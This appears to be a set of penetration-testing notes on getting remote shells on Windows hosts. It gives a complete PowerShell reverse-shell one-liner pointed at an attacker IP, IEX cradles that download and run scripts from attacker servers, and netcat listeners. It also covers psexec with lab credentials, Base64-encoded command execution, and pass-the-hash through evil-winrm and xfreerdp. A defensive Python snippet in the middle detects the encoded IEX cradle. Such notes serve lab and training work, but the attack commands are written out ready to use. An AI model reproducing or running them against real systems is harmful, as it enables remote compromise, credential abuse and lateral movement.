HTTP ↔ TCP
Nishang PS Reverse Shell
- From the Attacker 🗡️
Reverse Shell
Modify the one-liner's IP address and port as follows
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.30',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Simple HTTP Server
Check Simple HTTP Servers here
Set up a web server to serve the reverse shell
python3 -m http.server 8888
Listening Socket
Check Listening Sockets → Reference I ⚡ Reference II
Listen on the port set in the reverse shell script
rlwrap nc -nlvp 1234
- From the Target 🎯
Reverse Connection
Request the Reverse Shell → (New-Object Net.WebClient).DownloadString('<URL>')
Execute it → IEX
or Invoke-Expression
start /b powershell.exe -Command IEX (New-Object Net.Webclient).DownloadString('http://10.10.16.30:443/reverse_shell.ps1')
Same in Bash
The above reverse shell workflow is equivalent to the following in bash
curl --silent --request GET --location "URL" | bash -
PS v3.0 or later
IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest '<URL>')
SMB
PSExec
This tool from Impacket can be used to establish a bind shell if the authenticated user has administrative privileges on the workstation or domain computer
CMD
This tool allows an attacker to get a shell through cmd.exe
psexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>
PS
Sometimes it gets tricky to launch a powershell.exe instance. We can accomplish this task simply by establishing a reverse shell via Invoke-Expression, aka IEX
Reverse Shell Payload
curl --silent --request GET --location --output <FILE> "https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
Simple HTTP Server
python3 -m http.server <PORT>
Listening Socket
rlwrap -CaR nc -nlvp <PORT>
HTTP Request From Target and Reverse Shell Execution
psexec.py -dc-ip 10.129.135.22 active.htb/Administrator:Ticketmaster1968@active.htb "powershell.exe -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.34:8888/reverse.ps1')"
Caution
If something goes wrong and the reverse connection cannot be established, change the encoding of the above PowerShell command to UTF-16LE and Base64 encode it
echo -n "IEX (New-Object Net.WebClient).DownloadString('http://HOST:PORT/FILE')" | iconv --to-code UTF-16LE | base64 -w 0 ; echo
Then pass that Base64 string as the argument to the powershell.exe instance executed by psexec
psexec.py -dc-ip TARGET DOMAIN/USERNAME:PASSWORD@TARGET 'powershell.exe -Exec Bypass -Enc "BASE64_STRING"'
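From the defender's side, the scheme just described (UTF-16LE, then Base64, handed to -Enc) is exactly what appears in process-creation telemetry. The following Python is an added example, not part of these notes: it reproduces the encoding step, decodes such command lines and flags the IEX download cradle. The sample command lines and the indicator patterns are constructed here.

```python
import base64
import re

# Constructed samples (not from the notes): the described cradle and a benign command.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://HOST:PORT/FILE')"
BENIGN = "Get-Service -Name Spooler"

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common forms.
ENC_FLAG = re.compile(r'(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+"?([A-Za-z0-9+/=]+)')

# Building blocks of the download-and-execute cradle used in the notes.
INDICATORS = {
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\b"),
    "in_memory_exec": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "remote_url": re.compile(r"(?i)https?://\S+"),
}

def encode_powershell(command: str) -> str:
    """Same transform as `iconv --to-code UTF-16LE | base64 -w 0`."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")  # odd length or bad padding raises
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline: str) -> dict:
    """Classify one process command line (e.g. a Sysmon Event ID 1 CommandLine)."""
    decoded = decode_encoded_command(cmdline)
    text = decoded if decoded is not None else cmdline
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        # IEX paired with a download primitive is the cradle itself.
        "suspicious": {"download_cradle", "in_memory_exec"} <= set(hits),
    }

if __name__ == "__main__":
    for line in (f'powershell.exe -Exec Bypass -Enc "{encode_powershell(CRADLE)}"',
                 f"powershell.exe -EncodedCommand {encode_powershell(BENIGN)}"):
        print(triage(line))
```

The unencoded -Command form from the psexec example above is triaged by the same function, since the indicators are applied to the raw command line when no -Enc argument is present.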
RPC
WMIExec
wmiexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>
WinRM
EvilWinRM
Password Auth
evil-winrm --ip <TARGET> --port <PORT> --user <USER> --password <PASSWORD>
Pass The Hash
evil-winrm --ip <TARGET> --port <PORT> --user <USER> --hash <NTHASH>
SSL Enabled
evil-winrm --ip <TARGET> --port <PORT> --ssl --user <USER> --password <PASSWORD>
Upload and Download a File
Warning
The absolute path has to be specified for both uploading and downloading
PS> upload <LOCAL_PATH> <TARGET_FULL_PATH> # Upload
PS> download <TARGET_FULL_PATH> <LOCAL_PATH> # Download
Netexec
Remote Command Execution
- CMD
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -x <COMMAND>
- PS
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -X <COMMAND>
RDP
RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORD> <TARGET>
XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>
Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>
Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignore
Remmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>
Powershell
PSCredential + Invoke-Command -ScriptBlock
Creation of Credentials Object
$user = '<DOMAIN>\<USERNAME>'
$password = ConvertTo-SecureString -AsPlainText -Force -String '<PLAIN_PASSWORD>'
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$password
Command Execution as Another User
Invoke-Command -ComputerName <HOSTNAME> -Credential $credential -ScriptBlock { <COMMAND> }